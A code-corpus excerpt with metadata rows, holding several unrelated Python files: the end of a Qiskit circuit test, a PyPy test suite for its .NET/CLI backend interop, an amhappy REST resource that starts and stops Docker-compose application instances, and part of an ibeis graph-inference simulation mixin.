q_0: q_0: ─┤ H ├─
└─┬─┘
c0: 1/ + ┌──┴──┐ = DAGCircuitError
c: 2/╡ = 2 ╞
c1: 1/ └─────┘
"""
qreg = QuantumRegister(1)
creg1 = ClassicalRegister(1)
creg2 = ClassicalRegister(1)
circuit_left = QuantumCircuit(qreg, creg1, creg2)
wide_creg = ClassicalRegister(2)
circuit_right = QuantumCircuit(qreg, wide_creg)
circuit_right.h(0).c_if(wide_creg, 2)
with self.assertRaisesRegex(DAGCircuitError, 'more than one creg'):
circuit_left.compose(circuit_right)
if __name__ == '__main__':
unittest.main()
| 37.52809
| 80
| 0.404132
|
64c46cd8846e151b636f1b332a678efbc3a4928f
| 21,645
|
py
|
Python
|
pypy/translator/cli/test/test_dotnet.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | 12
|
2016-01-06T07:10:28.000Z
|
2021-05-13T23:02:02.000Z
|
pypy/translator/cli/test/test_dotnet.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | null | null | null |
pypy/translator/cli/test/test_dotnet.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | 2
|
2016-07-29T07:09:50.000Z
|
2016-10-16T08:50:26.000Z
|
import py
from pypy.annotation.annrpython import RPythonAnnotator
from pypy.annotation import model as annmodel
from pypy.rpython.ootypesystem import ootype
from pypy.rpython.ootypesystem.ootype import meth, Meth, Char, Signed, Float, String,\
ROOT, overload, Instance, new
from pypy.translator.cli.test.runtest import CliTest
from pypy.translator.cli.dotnet import SomeCliClass, SomeCliStaticMethod,\
NativeInstance, CLR, box, unbox, OverloadingResolver, NativeException,\
native_exc, new_array, init_array, typeof, eventhandler, clidowncast,\
fieldinfo_for_const, classof
System = CLR.System
ArrayList = CLR.System.Collections.ArrayList
OpCodes = System.Reflection.Emit.OpCodes
DynamicMethod = System.Reflection.Emit.DynamicMethod
Utils = CLR.pypy.runtime.Utils
FUNCTYPE = ootype.StaticMethod([ootype.Signed, ootype.Signed], ootype.Signed)
class TestDotnetAnnotation(object):
def test_overloaded_meth_string(self):
C = Instance("test", ROOT, {},
{'foo': overload(meth(Meth([Char], Signed)),
meth(Meth([String], Float)),
resolver=OverloadingResolver),
'bar': overload(meth(Meth([Signed], Char)),
meth(Meth([Float], String)),
resolver=OverloadingResolver)})
def fn1():
return new(C).foo('a')
def fn2():
return new(C).foo('aa')
def fn3(x):
return new(C).bar(x)
a = RPythonAnnotator()
assert isinstance(a.build_types(fn1, []), annmodel.SomeInteger)
assert isinstance(a.build_types(fn2, []), annmodel.SomeFloat)
assert isinstance(a.build_types(fn3, [int]), annmodel.SomeChar)
assert isinstance(a.build_types(fn3, [float]), annmodel.SomeString)
def test_class(self):
def fn():
return System.Math
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, SomeCliClass)
assert s.const is System.Math
def test_fullname(self):
def fn():
return CLR.System.Math
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, SomeCliClass)
assert s.const is System.Math
def test_staticmeth(self):
def fn():
return System.Math.Abs
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, SomeCliStaticMethod)
assert s.cli_class is System.Math
assert s.meth_name == 'Abs'
def test_staticmeth_call(self):
def fn1():
return System.Math.Abs(42)
def fn2():
return System.Math.Abs(42.5)
a = RPythonAnnotator()
assert type(a.build_types(fn1, [])) is annmodel.SomeInteger
assert type(a.build_types(fn2, [])) is annmodel.SomeFloat
def test_new_instance(self):
def fn():
return ArrayList()
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeOOInstance)
assert isinstance(s.ootype, NativeInstance)
assert s.ootype._name == '[mscorlib]System.Collections.ArrayList'
def test_box(self):
def fn():
return box(42)
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.ootype._name == '[mscorlib]System.Object'
assert not s.can_be_None
def test_box_can_be_None(self):
def fn(flag):
if flag:
return box(42)
else:
return box(None)
a = RPythonAnnotator()
s = a.build_types(fn, [bool])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.ootype._name == '[mscorlib]System.Object'
assert s.can_be_None
def test_unbox(self):
def fn():
x = box(42)
return unbox(x, ootype.Signed)
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeInteger)
def test_unbox_can_be_None(self):
class Foo:
pass
def fn():
x = box(42)
return unbox(x, Foo)
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeInstance)
assert s.can_be_None
def test_array(self):
def fn():
x = ArrayList()
return x.ToArray()
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.ootype._isArray
assert s.ootype._ELEMENT._name == '[mscorlib]System.Object'
def test_array_getitem(self):
def fn():
x = ArrayList().ToArray()
return x[0]
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.ootype._name == '[mscorlib]System.Object'
def test_mix_None_and_instance(self):
def fn(x):
if x:
return None
else:
return box(42)
a = RPythonAnnotator()
s = a.build_types(fn, [bool])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.can_be_None == True
def test_box_instance(self):
class Foo:
pass
def fn():
return box(Foo())
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeOOInstance)
assert s.ootype._name == '[mscorlib]System.Object'
def test_unbox_instance(self):
class Foo:
pass
def fn():
boxed = box(Foo())
return unbox(boxed, Foo)
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeInstance)
assert s.classdef.name.endswith('Foo')
def test_can_be_None(self):
def fn():
ttype = System.Type.GetType('foo')
return ttype.get_Namespace()
a = RPythonAnnotator()
s = a.build_types(fn, [])
assert isinstance(s, annmodel.SomeString)
assert s.can_be_None
class TestDotnetRtyping(CliTest):
def _skip_pythonnet(self, msg):
pass
def test_staticmeth_call(self):
def fn(x):
return System.Math.Abs(x)
assert self.interpret(fn, [-42]) == 42
def test_staticmeth_overload(self):
self._skip_pythonnet('Pythonnet bug!')
def fn(x, y):
return System.Math.Abs(x), System.Math.Abs(y)
res = self.interpret(fn, [-42, -42.5])
item0, item1 = self.ll_to_tuple(res)
assert item0 == 42
assert item1 == 42.5
def test_tostring(self):
StringBuilder = CLR.System.Text.StringBuilder
def fn():
x = StringBuilder()
x.Append(box("foo")).Append(box("bar"))
return x.ToString()
res = self.ll_to_string(self.interpret(fn, []))
assert res == 'foobar'
def test_box(self):
def fn():
x = ArrayList()
x.Add(box(42))
x.Add(box('Foo'))
return x.get_Count()
assert self.interpret(fn, []) == 2
def test_whitout_box(self):
def fn():
x = ArrayList()
x.Add(42) # note we have forgot box()
py.test.raises(TypeError, self.interpret, fn, [])
def test_unbox(self):
def fn():
x = ArrayList()
x.Add(box(42))
return unbox(x.get_Item(0), ootype.Signed)
assert self.interpret(fn, []) == 42
def test_unbox_string(self):
def fn():
x = ArrayList()
x.Add(box('foo'))
return unbox(x.get_Item(0), ootype.String)
assert self.interpret(fn, []) == 'foo'
def test_box_method(self):
def fn():
x = box(42)
t = x.GetType()
return t.get_Name()
res = self.interpret(fn, [])
assert res == 'Int32'
def test_box_object(self):
def fn():
return box(System.Object()).ToString()
res = self.interpret(fn, [])
assert res == 'System.Object'
def test_array(self):
def fn():
x = ArrayList()
x.Add(box(42))
array = x.ToArray()
return unbox(array[0], ootype.Signed)
assert self.interpret(fn, []) == 42
def test_new_array(self):
def fn():
x = new_array(System.Object, 2)
x[0] = box(42)
x[1] = box(43)
return unbox(x[0], ootype.Signed) + unbox(x[1], ootype.Signed)
assert self.interpret(fn, []) == 42+43
def test_init_array(self):
def fn():
x = init_array(System.Object, box(42), box(43))
return unbox(x[0], ootype.Signed) + unbox(x[1], ootype.Signed)
assert self.interpret(fn, []) == 42+43
def test_array_setitem_None(self):
py.test.skip('Mono bug :-(')
def fn():
x = init_array(System.Object, box(42), box(43))
x[0] = None
return x[0]
assert self.interpret(fn, []) is None
def test_array_length(self):
def fn():
x = init_array(System.Object, box(42), box(43))
return len(x)
assert self.interpret(fn, []) == 2
def test_null(self):
def fn():
return System.Object.Equals(None, None)
assert self.interpret(fn, []) == True
def test_null_bound_method(self):
def fn():
x = ArrayList()
x.Add(None)
return x.get_Item(0)
assert self.interpret(fn, []) is None
def test_native_exception_precise(self):
ArgumentOutOfRangeException = NativeException(CLR.System.ArgumentOutOfRangeException)
def fn():
x = ArrayList()
try:
x.get_Item(0)
return False
except ArgumentOutOfRangeException:
return True
assert self.interpret(fn, []) == True
def test_native_exception_superclass(self):
SystemException = NativeException(CLR.System.Exception)
def fn():
x = ArrayList()
try:
x.get_Item(0)
return False
except SystemException:
return True
assert self.interpret(fn, []) == True
def test_native_exception_object(self):
SystemException = NativeException(CLR.System.Exception)
def fn():
x = ArrayList()
try:
x.get_Item(0)
return "Impossible!"
except SystemException, e:
ex = native_exc(e)
return ex.get_Message()
res = self.ll_to_string(self.interpret(fn, []))
assert res.startswith("Index is less than 0")
def test_native_exception_invoke(self):
TargetInvocationException = NativeException(CLR.System.Reflection.TargetInvocationException)
def fn():
x = ArrayList()
t = x.GetType()
meth = t.GetMethod('get_Item')
args = init_array(System.Object, box(0))
try:
meth.Invoke(x, args)
return "Impossible!"
except TargetInvocationException, e:
inner = native_exc(e).get_InnerException()
message = str(inner.get_Message())
return message
res = self.ll_to_string(self.interpret(fn, []))
assert res.startswith("Index is less than 0")
def test_typeof(self):
def fn():
x = box(42)
return x.GetType() == typeof(System.Int32)
res = self.interpret(fn, [])
assert res is True
def test_typeof_pypylib(self):
DelegateType = CLR.pypy.test.DelegateType_int__int_2
def fn():
return typeof(DelegateType) is not None
res = self.interpret(fn, [])
assert res is True
def test_typeof_functype(self):
# this test is overridden in TestPythonnet
def fn():
t = typeof(FUNCTYPE)
return t.get_Name()
res = self.interpret(fn, [])
assert res.startswith('StaticMethod__')
def test_clidowncast(self):
def fn():
a = ArrayList()
b = ArrayList()
a.Add(b)
c = a.get_Item(0) # type of c is Object
c = clidowncast(c, ArrayList)
c.Add(None)
return c.get_Item(0)
res = self.interpret(fn, [])
assert res is None
def test_clidowncast_lltype(self):
ARRAY_LIST = ArrayList._INSTANCE
def fn():
a = ArrayList()
b = ArrayList()
a.Add(b)
c = a.get_Item(0) # type of c is Object
c = clidowncast(c, ARRAY_LIST)
c.Add(None)
return c.get_Item(0)
res = self.interpret(fn, [])
assert res is None
def test_mix_None_and_instance(self):
def g(x):
return x
def fn(flag):
if flag:
x = None
else:
x = box(42)
return g(x)
res = self.interpret(fn, [1])
assert res is None
def test_box_unbox_instance(self):
class Foo:
pass
def fn():
obj = Foo()
b_obj = box(obj)
obj2 = unbox(b_obj, Foo)
return obj is obj2
res = self.interpret(fn, [])
assert res is True
def test_unbox_instance_fail(self):
class Foo:
pass
def fn():
b_obj = box(42)
return unbox(b_obj, Foo)
res = self.interpret(fn, [])
assert res is None
def test_box_unbox_ooinstance(self):
A = ootype.Instance('A', ootype.ROOT, {'xx': ootype.Signed})
def fn(flag):
a = ootype.new(A)
a.xx = 42
b_obj = box(a)
a2 = unbox(b_obj, A)
return a2.xx
res = self.interpret(fn, [True])
assert res == 42
def test_box_unbox_ooinstance_fail(self):
A = ootype.Instance('A', ootype.ROOT, {'xx': ootype.Signed})
def fn(flag):
b_obj = System.Object()
a2 = unbox(b_obj, A)
return a2
res = self.interpret(fn, [True])
assert res is None
def test_box_unbox_oorecord(self):
A = ootype.Record({'xx': ootype.Signed})
def fn(flag):
a = ootype.new(A)
a.xx = 42
b_obj = box(a)
a2 = unbox(b_obj, A)
return a2.xx
res = self.interpret(fn, [True])
assert res == 42
def test_instance_wrapping(self):
class Foo:
pass
def fn():
obj = Foo()
x = ArrayList()
x.Add(box(obj))
obj2 = unbox(x.get_Item(0), Foo)
return obj is obj2
res = self.interpret(fn, [])
assert res is True
def test_compare_string_None(self):
from pypy.rlib.nonconst import NonConstant
def null():
if NonConstant(True):
return None
else:
return ""
def fn():
ttype = System.Type.GetType('Consts, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089')
namespace = ttype.get_Namespace()
if namespace is not None:
return False
else:
return True
res = self.interpret(fn, [], backendopt=False)
assert res is True
def test_delegate(self):
class Foo:
def __init__(self):
self.x = 0
def m(self, sender, args):
self.x = 42
def fn(flag):
f = Foo()
if flag:
f.m(None, None)
delegate = eventhandler(f.m)
delegate.Invoke(None, None)
return f.x
res = self.interpret(fn, [False])
assert res == 42
def test_static_fields(self):
DummyClass = CLR.pypy.test.DummyClass
def fn():
obj = System.Object()
DummyClass.myfield = obj
return DummyClass.myfield is obj
res = self.interpret(fn, [])
assert res
def test_pypylib(self):
def fn():
return CLR.pypy.runtime.Utils.OOString(42, -1)
res = self.interpret(fn, [])
assert self.ll_to_string(res) == '42'
def test_call_delegate(self):
def build_fn():
tInt = typeof(System.Int32)
args = init_array(System.Type, tInt, tInt)
meth = Utils.CreateDynamicMethod("add", tInt, args)
il = meth.GetILGenerator()
il.Emit(OpCodes.Ldarg_0)
il.Emit(OpCodes.Ldarg_1)
il.Emit(OpCodes.Add)
il.Emit(OpCodes.Ret)
myfunc = meth.CreateDelegate(typeof(FUNCTYPE))
return myfunc
def fn():
myfunc = unbox(build_fn(), FUNCTYPE)
return myfunc(30, 12)
res = self.interpret(fn, [])
assert res == 42
def test_bound_delegate(self):
def build_fn():
tObjArray = System.Type.GetType("System.Object[]")
tInt = typeof(System.Int32)
args = init_array(System.Type, tObjArray, tInt, tInt)
meth = Utils.CreateDynamicMethod("add", tInt, args)
il = meth.GetILGenerator()
il.Emit(OpCodes.Ldarg_1)
il.Emit(OpCodes.Ldarg_2)
il.Emit(OpCodes.Add)
il.Emit(OpCodes.Ret)
array = new_array(System.Object, 0)
myfunc = meth.CreateDelegate(typeof(FUNCTYPE), array)
return myfunc
def fn():
myfunc = unbox(build_fn(), FUNCTYPE)
return myfunc(30, 12)
res = self.interpret(fn, [])
assert res == 42
def test_valuetype_field(self):
class Foo:
def __init__(self, x):
self.x = x
def fn():
f = Foo(OpCodes.Add)
return f
self.interpret(fn, [])
def test_fieldinfo_for_const(self):
A = ootype.Instance('A', ootype.ROOT, {'xx': ootype.Signed})
const = ootype.new(A)
const.xx = 42
def fn():
fieldinfo = fieldinfo_for_const(const)
obj = fieldinfo.GetValue(None)
# get the 'xx' field by using reflection
t = obj.GetType()
x_info = t.GetField('xx')
x_value = x_info.GetValue(obj)
return unbox(x_value, ootype.Signed)
res = self.interpret(fn, [])
assert res == 42
def test_fieldinfo_for_const_pbc(self):
A = ootype.Instance('A', ootype.ROOT, {'xx': ootype.Signed})
const = ootype.new(A)
fieldinfo = fieldinfo_for_const(const)
def fn():
const.xx = 42
obj = fieldinfo.GetValue(None)
# get the 'xx' field by using reflection
t = obj.GetType()
x_info = t.GetField('xx')
x_value = x_info.GetValue(obj)
return unbox(x_value, ootype.Signed)
res = self.interpret(fn, [])
assert res == 42
def test_classof(self):
int32_class = classof(System.Int32)
def fn():
int32_obj = box(int32_class)
int32_type = clidowncast(int32_obj, System.Type)
return int32_type.get_Name()
assert self.interpret(fn, []) == 'Int32'
def test_classof_compare(self):
int32_a = classof(System.Int32)
int32_b = classof(System.Int32)
def fn():
return int32_a is int32_b
assert self.interpret(fn, [])
def test_classof_functype(self):
# this test is overridden in TestPythonnet
c = classof(FUNCTYPE)
def fn():
obj = box(c)
t = clidowncast(obj, System.Type)
return t.get_Name()
res = self.interpret(fn, [])
assert res.startswith('StaticMethod__')
def test_mix_classof(self):
a = classof(System.Int32)
b = classof(FUNCTYPE)
def fn(flag):
if flag:
x = a
else:
x = b
return clidowncast(box(x), System.Type).get_Name()
res = self.interpret(fn, [True])
assert res == 'Int32'
class TestPythonnet(TestDotnetRtyping):
# don't interpreter functions but execute them directly through pythonnet
def interpret(self, f, args, backendopt='ignored'):
return f(*args)
def _skip_pythonnet(self, msg):
py.test.skip(msg)
def test_whitout_box(self):
pass # it makes sense only during translation
def test_typeof_functype(self):
def fn():
t = typeof(FUNCTYPE)
return t.get_Name()
res = self.interpret(fn, [])
assert res == 'DelegateType_int__int_2'
def test_classof_functype(self):
# this test is overridden in TestPythonnet
c = classof(FUNCTYPE)
def fn():
obj = box(c)
t = clidowncast(obj, System.Type)
return t.get_Name()
res = self.interpret(fn, [])
assert res == 'DelegateType_int__int_2'
def test_fieldinfo_for_const(self):
pass # it makes sense only during translation
def test_fieldinfo_for_const_pbc(self):
pass # it makes sense only during translation
| 31.924779
| 126
| 0.544652
|
6992c115a9faa2fb70414a73636ce6b97a3a5b33
| 21
|
py
|
Python
|
olive/scripts/calibration/__init__.py
|
liuyenting/olive-core
|
b532b29e29fe9f167369f66b8d922f5f644f9309
|
[
"Apache-2.0"
] | null | null | null |
olive/scripts/calibration/__init__.py
|
liuyenting/olive-core
|
b532b29e29fe9f167369f66b8d922f5f644f9309
|
[
"Apache-2.0"
] | null | null | null |
olive/scripts/calibration/__init__.py
|
liuyenting/olive-core
|
b532b29e29fe9f167369f66b8d922f5f644f9309
|
[
"Apache-2.0"
] | null | null | null |
from .aotf import *
| 10.5
| 20
| 0.666667
|
9eea9c32ce1aca0ad55172114bb66419781464a3
| 3,509
|
py
|
Python
|
amhappy/resources/happinstance.py
|
ltang-cars/amhappy
|
639d94eecb3cc5bab9128d93aadc5c50637a9a55
|
[
"BSD-2-Clause"
] | 15
|
2015-03-26T17:28:03.000Z
|
2020-11-18T18:25:00.000Z
|
amhappy/resources/happinstance.py
|
ltang-cars/amhappy
|
639d94eecb3cc5bab9128d93aadc5c50637a9a55
|
[
"BSD-2-Clause"
] | 7
|
2015-03-26T02:07:59.000Z
|
2015-04-14T21:08:12.000Z
|
amhappy/resources/happinstance.py
|
ltang-cars/amhappy
|
639d94eecb3cc5bab9128d93aadc5c50637a9a55
|
[
"BSD-2-Clause"
] | 6
|
2015-03-26T17:27:21.000Z
|
2017-11-16T18:24:44.000Z
|
# -*- coding: utf-8 -*-
from cornice.resource import resource, view
from amhappy.utility.validators import validator_factory
from amhappy.utility.happinstance_db import HappinstanceDB
@resource(collection_path='/happinstances',
path='/happinstances/{application}/{name}',
cors_enabled=True, cors_origins=('*',))
class Happinstance(object):
"""
A happinstance is an instance of an application that is read to run. This
is a REST endpoint
It named for being a Happy Instance
"""
def __init__(self, request):
"""
Basic init method that also sets up the instance variables for some of
the endpoints
:param request: The pyramid request
:type request: Request
"""
self.request = request
self.happinstancedb = HappinstanceDB(request)
self.name = ''
self.application = ''
self.project = None
self.config = ''
def collection_get(self):
"""
Get the current happinstances, running or not
:return: Dictionary of the happinstances
:rtype: dict
"""
# cast the storage as a dict and return it
return {'happinstances': self.happinstancedb}
@view(renderer='json', validators=validator_factory('exists'))
def get(self):
"""
Get the detail for a particular happinstance
"""
self._get_valid_objects()
return self.happinstancedb[self.application].get(self.name)
@view(renderer='json', validators=[validator_factory('unique'),
validator_factory('valid_config')])
def post(self):
"""
Take a unique and valid config and create a new happinstance and start
it up. a POST endpoint
"""
self._get_valid_objects()
# a happinstance is defined by its config and status and keyed on its
# name
happinstance = {'_id': self.name,
'config': self.config, 'status': 'on'}
self.project.up()
self.happinstancedb[self.application].save(happinstance)
return {'status': 'ok'}
@view(renderer='json', validators=validator_factory('exists'))
def delete(self):
"""
If the happinstance exists, stop it and remove the containers and the
entry in the db.
"""
self._get_valid_objects()
self.project.stop()
self.project.remove_stopped()
del self.happinstancedb[self.application][self.name]
@view(renderer='json', validators=[validator_factory('exists'),
validator_factory('valid_action')])
def put(self):
"""
take a validated action and either start or stop a happinstance
"""
self._get_valid_objects()
action = self.request.validated['action']
happinstance = self.happinstancedb[self.application].get(self.name)
if action == 'on':
self.project.start()
else:
self.project.stop()
happinstance['status'] = action
self.happinstancedb[self.application].save(happinstance)
def _get_valid_objects(self):
"""
Pull the validated values and put them into instance vars
"""
self.name = self.request.validated['name']
self.application = self.request.validated['application']
self.project = self.request.validated['project']
self.config = self.request.validated['config']
| 35.09
| 78
| 0.61442
|
1ee2e4fad37214e1b107b3f66feb1ba701c300af
| 18,825
|
py
|
Python
|
ibeis/algo/graph/mixin_simulation.py
|
brmscheiner/ibeis
|
9bb93a6cd74ac47921e734c80917a38609dfe661
|
[
"Apache-2.0"
] | null | null | null |
ibeis/algo/graph/mixin_simulation.py
|
brmscheiner/ibeis
|
9bb93a6cd74ac47921e734c80917a38609dfe661
|
[
"Apache-2.0"
] | null | null | null |
ibeis/algo/graph/mixin_simulation.py
|
brmscheiner/ibeis
|
9bb93a6cd74ac47921e734c80917a38609dfe661
|
[
"Apache-2.0"
] | null | null | null |
"""
Mixin functionality for experiments, tests, and simulations.
This includes recordings measures used to generate plots in JC's thesis.
"""
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import six
import utool as ut
import ubelt as ub
import pandas as pd
import itertools as it
from ibeis.algo.graph import nx_utils as nxu
from ibeis.algo.graph.state import (POSTV, NEGTV, INCMP, UNREV, UNKWN, NULL)
print, rrr, profile = ut.inject2(__name__)
class SimulationHelpers(object):
def init_simulation(infr, oracle_accuracy=1.0, k_redun=2,
enable_autoreview=True, enable_inference=True,
classifiers=None, match_state_thresh=None,
max_outer_loops=None, name=None):
infr.print('INIT SIMULATION', color='yellow')
infr.name = name
infr.simulation_mode = True
infr.verifiers = classifiers
infr.params['inference.enabled'] = enable_inference
infr.params['autoreview.enabled'] = enable_autoreview
infr.params['redun.pos'] = k_redun
infr.params['redun.neg'] = k_redun
# keeps track of edges where the decision != the groundtruth
infr.mistake_edges = set()
infr.queue = ut.PriorityQueue()
infr.oracle = UserOracle(oracle_accuracy, rng=infr.name)
if match_state_thresh is None:
match_state_thresh = {
POSTV: 1.0,
NEGTV: 1.0,
INCMP: 1.0,
}
pb_state_thresh = None
if pb_state_thresh is None:
pb_state_thresh = {
'pb': .5,
'notpb': .9,
}
infr.task_thresh = {
'photobomb_state': pd.Series(pb_state_thresh),
'match_state': pd.Series(match_state_thresh)
}
infr.params['algo.max_outer_loops'] = max_outer_loops
def init_test_mode(infr):
from ibeis.algo.graph import nx_dynamic_graph
infr.print('init_test_mode')
infr.test_mode = True
# infr.edge_truth = {}
infr.metrics_list = []
infr.test_state = {
'n_decision': 0,
'n_algo': 0,
'n_manual': 0,
'n_true_merges': 0,
'n_error_edges': 0,
'confusion': None,
}
infr.test_gt_pos_graph = nx_dynamic_graph.DynConnGraph()
infr.test_gt_pos_graph.add_nodes_from(infr.aids)
infr.nid_to_gt_cc = ut.group_items(infr.aids, infr.orig_name_labels)
infr.node_truth = ut.dzip(infr.aids, infr.orig_name_labels)
# infr.real_n_pcc_mst_edges = sum(
# len(cc) - 1 for cc in infr.nid_to_gt_cc.values())
# ut.cprint('real_n_pcc_mst_edges = %r' % (
# infr.real_n_pcc_mst_edges,), 'red')
infr.metrics_list = []
infr.nid_to_gt_cc = ut.group_items(infr.aids, infr.orig_name_labels)
infr.real_n_pcc_mst_edges = sum(
len(cc) - 1 for cc in infr.nid_to_gt_cc.values())
infr.print('real_n_pcc_mst_edges = %r' % (
infr.real_n_pcc_mst_edges,), color='red')
def measure_error_edges(infr):
for edge, data in infr.edges(data=True):
true_state = data['truth']
pred_state = data.get('evidence_decision', UNREV)
if pred_state != UNREV:
if true_state != pred_state:
error = ut.odict([('real', true_state),
('pred', pred_state)])
yield edge, error
@profile
def measure_metrics(infr):
real_pos_edges = []
n_true_merges = infr.test_state['n_true_merges']
confusion = infr.test_state['confusion']
n_tp = confusion[POSTV][POSTV]
confusion[POSTV]
columns = set(confusion.keys())
reviewd_cols = columns - {UNREV}
non_postv = reviewd_cols - {POSTV}
non_negtv = reviewd_cols - {NEGTV}
n_fn = sum(ut.take(confusion[POSTV], non_postv))
n_fp = sum(ut.take(confusion[NEGTV], non_negtv))
n_error_edges = sum(confusion[r][c] + confusion[c][r] for r, c in
ut.combinations(reviewd_cols, 2))
# assert n_fn + n_fp == n_error_edges
pred_n_pcc_mst_edges = n_true_merges
if 0:
import ubelt as ub
for timer in ub.Timerit(10):
with timer:
# Find undetectable errors
num_undetectable_fn = 0
for nid1, nid2 in infr.neg_redun_metagraph.edges():
cc1 = infr.pos_graph.component(nid1)
cc2 = infr.pos_graph.component(nid2)
neg_edges = nxu.edges_cross(infr.neg_graph, cc1, cc2)
for u, v in neg_edges:
real_nid1 = infr.node_truth[u]
real_nid2 = infr.node_truth[v]
if real_nid1 == real_nid2:
num_undetectable_fn += 1
break
# Find undetectable errors
num_undetectable_fp = 0
for nid in infr.pos_redun_nids:
cc = infr.pos_graph.component(nid)
if not ut.allsame(ut.take(infr.node_truth, cc)):
num_undetectable_fp += 1
print('num_undetectable_fn = %r' % (num_undetectable_fn,))
print('num_undetectable_fp = %r' % (num_undetectable_fp,))
if 0:
n_error_edges2 = 0
n_fn2 = 0
n_fp2 = 0
for edge, data in infr.edges(data=True):
decision = data.get('evidence_decision', UNREV)
true_state = infr.edge_truth[edge]
if true_state == decision and true_state == POSTV:
real_pos_edges.append(edge)
elif decision != UNREV:
if true_state != decision:
n_error_edges2 += 1
if true_state == POSTV:
n_fn2 += 1
elif true_state == NEGTV:
n_fp2 += 1
assert n_error_edges2 == n_error_edges
assert n_tp == len(real_pos_edges)
assert n_fn == n_fn2
assert n_fp == n_fp2
# pred_n_pcc_mst_edges2 = sum(
# len(cc) - 1 for cc in infr.test_gt_pos_graph.connected_components()
# )
if False:
import networkx as nx
# set(infr.test_gt_pos_graph.edges()) == set(real_pos_edges)
pred_n_pcc_mst_edges = 0
for cc in nx.connected_components(nx.Graph(real_pos_edges)):
pred_n_pcc_mst_edges += len(cc) - 1
assert n_true_merges == pred_n_pcc_mst_edges
# Find all annotations involved in a mistake
assert n_error_edges == len(infr.mistake_edges)
direct_mistake_aids = {a for edge in infr.mistake_edges for a in edge}
mistake_nids = set(infr.node_labels(*direct_mistake_aids))
mistake_aids = set(ut.flatten([infr.pos_graph.component(nid)
for nid in mistake_nids]))
pos_acc = pred_n_pcc_mst_edges / infr.real_n_pcc_mst_edges
metrics = {
'n_decision': infr.test_state['n_decision'],
'n_manual': infr.test_state['n_manual'],
'n_algo': infr.test_state['n_algo'],
'phase': infr.loop_phase,
'pos_acc': pos_acc,
'n_merge_total': infr.real_n_pcc_mst_edges,
'n_merge_remain': infr.real_n_pcc_mst_edges - n_true_merges,
'n_true_merges': n_true_merges,
'recovering': infr.is_recovering(),
# 'recovering2': infr.test_state['recovering'],
'merge_remain': 1 - pos_acc,
'n_mistake_aids': len(mistake_aids),
'frac_mistake_aids': len(mistake_aids) / len(infr.aids),
'n_mistake_nids': len(mistake_nids),
'n_errors': n_error_edges,
'n_fn': n_fn,
'n_fp': n_fp,
'refresh_support': len(infr.refresh.manual_decisions),
'pprob_any': infr.refresh.prob_any_remain(),
'mu': infr.refresh._ewma,
'test_action': infr.test_state['test_action'],
'action': infr.test_state.get('action', None),
'user_id': infr.test_state['user_id'],
'pred_decision': infr.test_state['pred_decision'],
'true_decision': infr.test_state['true_decision'],
'n_neg_redun': infr.neg_redun_metagraph.number_of_edges(),
'n_neg_redun1': (infr.neg_metagraph.number_of_edges() -
infr.neg_metagraph.number_of_selfloops()),
}
return metrics
def _print_previous_loop_statistics(infr, count):
# Print stats about what happend in the this loop
history = infr.metrics_list[-count:]
recover_blocks = ut.group_items([
(k, sum(1 for i in g))
for k, g in it.groupby(ut.take_column(history, 'recovering'))
]).get(True, [])
infr.print((
'Recovery mode entered {} times, '
'made {} recovery decisions.').format(
len(recover_blocks), sum(recover_blocks)), color='green')
testaction_hist = ut.dict_hist(ut.take_column(history, 'test_action'))
infr.print(
'Test Action Histogram: {}'.format(
ut.repr4(testaction_hist, si=True)), color='yellow')
if infr.params['inference.enabled']:
action_hist = ut.dict_hist(
ut.emap(frozenset, ut.take_column(history, 'action')))
infr.print(
'Inference Action Histogram: {}'.format(
ub.repr2(action_hist, si=True)), color='yellow')
infr.print(
'Decision Histogram: {}'.format(ut.repr2(ut.dict_hist(
ut.take_column(history, 'pred_decision')
), si=True)), color='yellow')
infr.print(
'User Histogram: {}'.format(ut.repr2(ut.dict_hist(
ut.take_column(history, 'user_id')
), si=True)), color='yellow')
@profile
def _dynamic_test_callback(infr, edge, decision, prev_decision, user_id):
was_gt_pos = infr.test_gt_pos_graph.has_edge(*edge)
# prev_decision = infr.get_edge_attr(edge, 'decision', default=UNREV)
# prev_decision = list(infr.edge_decision_from([edge]))[0]
true_decision = infr.edge_truth[edge]
was_within_pred = infr.pos_graph.are_nodes_connected(*edge)
was_within_gt = infr.test_gt_pos_graph.are_nodes_connected(*edge)
was_reviewed = prev_decision != UNREV
is_within_gt = was_within_gt
was_correct = prev_decision == true_decision
is_correct = true_decision == decision
# print('prev_decision = {!r}'.format(prev_decision))
# print('decision = {!r}'.format(decision))
# print('true_decision = {!r}'.format(true_decision))
test_print = ut.partial(infr.print, level=2)
def test_print(x, **kw):
infr.print('[ACTION] ' + x, level=2, **kw)
# test_print = lambda *a, **kw: None # NOQA
if 0:
num = infr.recover_graph.number_of_components()
old_data = infr.get_nonvisual_edge_data(edge)
# print('old_data = %s' % (ut.repr4(old_data, stritems=True),))
print('n_prev_reviews = %r' % (old_data['num_reviews'],))
print('prev_decision = %r' % (prev_decision,))
print('decision = %r' % (decision,))
print('was_gt_pos = %r' % (was_gt_pos,))
print('was_within_pred = %r' % (was_within_pred,))
print('was_within_gt = %r' % (was_within_gt,))
